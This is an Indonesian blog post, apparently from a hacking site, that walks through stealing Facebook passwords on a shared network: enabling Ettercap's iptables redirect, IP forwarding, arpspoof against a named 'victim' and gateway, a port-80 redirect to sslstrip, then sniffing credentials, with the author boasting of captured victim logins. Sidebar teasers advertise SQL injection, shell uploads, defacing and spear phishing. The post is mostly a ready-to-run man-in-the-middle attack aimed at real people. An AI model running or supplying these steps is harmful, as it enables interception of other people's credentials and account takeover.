SSL Strip Hijack Facebook Password
SSL Strip Hijack Facebook Password
Oke, dalam kesempatan ini saya sedang malas membuat kalimat pembuka, jadi kita langsung saja ke pesta.
Pertama, cek konfigurasi Ettercap dengan memasukan command ini di terminal:
Code:
root@metasploit:~# gedit /etc/etter.confKemudian cek baris ke 167:
File:
# if you use iptables: #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"Hapus karakter pagar di depan line ke 168: "#redir command on ....", sehingga menjadi:
File:
# if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"Save, lalu kita akan menuju tahap kedua. Masukan perintah ini dengan menggunakan terminal:
Code:
root@metasploit:~# echo 1 > /proc/sys/net/ipv4/ip_forwardKemudian:
Code:
root@metasploit:~# arpspoof -i wlan0 -t [ipaddress korban] [default gateway korban]Jika berhasil, maka terminal akan tampak seperti ini:
Kemudian kita akan melakukan proses routing, dimana korban akan dialihkan ke suatu ip address atai port yang telah ditentukan oleh penyerang. Masukan kode berikut. [Catatan: Jangan hentikan proses arpspoof, buat tab baru, atau buka terminal baru untuk melakukan proses routing]
Code:
root@metasploit:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000Pada tahap ini korban tidak akan bisa menuju web manapun yang menggunakan koneksi SSL atau HTTPS karena sudah dirouting ke port 10000. Disaat krusial ini, kita membutuhkan bantuan SSLstrip untuk mengijinkan korban mengakses HTTPS dengan syarat kebobolan password. Masukan kode berikut:
Code:
root@metasploit:~# sslstrip -a -k -fKemudian kita sniffing kembali koneksi yang terjadi pada ip address korban dengan bantuan ettercap. Anda tidak akan percaya dengan apa yang sudah saya lakukan. Berikut screenshoot korban yang saya dapatkan.
About: jefri
You may also like...
Langganan:
Posting Komentar (Atom)
Recent Posts
Popular Posts
-
1.LOAD_FILE Load file adalah query SQL untuk meng-load suatu file scara remote..kurang lebihnya seperti itu ..
-
siap meluncur di tunggu dari kawan kawan untuk sharing bugs and scaning pake bot
-
assalamualaikummm permisi bang ane cuma mau share,.... gimana cara atau trik membuat Flashing screen ( atau layar menjadi kelap kelip,....)
-
Oke, untuk yang belum tau aja yhaa... ^^ Utk pengguna windoss, install dlu interpreter python, coz bhs ini ga default ada… (ckckck...
-
Ciuman adalah bahasa tubuh yang populer untuk mengungkapkan rasa sayang kepada pasangan, teman maupun keluarga. Tapi ada beberapa tipe...
-
Gambaran Web Attack : Scan => XPL/SQLi => Upload Shell => Deface/Jumping => Rooting 1. Scan Cari tau dimana letak kel...
-
jika kamu adalah seorang admin,webmaster di suatu website . . . pasti kamu ingin menangkalserangan ini...ane akan beri sedikit ...
-
Membuat payload dan mengirimnya kepada target dengan metode spear pishing attack adalah cara termudah dalam melakukan exploitasi. Nam...
-
Assalamu alaikum Sudah lama tidak posting blog nih disini saya akan membahas cara membuat program transaksi penjualan dengan Fox pro ...
-
Pada hari ini saya akan posting alur web attack buat yang mau blajar silahkan 1. Scan Cari tau dimana letak kelemahaan web target. bi...
Recent Comments
Labels
Labels
Find us on Facebook
Labels
- backtrack (47)
- berita (12)
- blogseo (6)
- education (1)
- foxpro (2)
- hacking (78)
- Ilmu Komputer (131)
- info unik (32)
- intim (12)
- kesehatan (23)
- lounge (4)
- love (11)
- network (1)
- Network-Linux (1)
- network-windows (1)
- olahraga (5)
- pascal (2)
- php (1)
- programer (29)
- relationship (23)
- sqljavascriptdll (7)
- Virus (1)
- webhacking (9)
- wifihack (8)




Tidak ada komentar:
Posting Komentar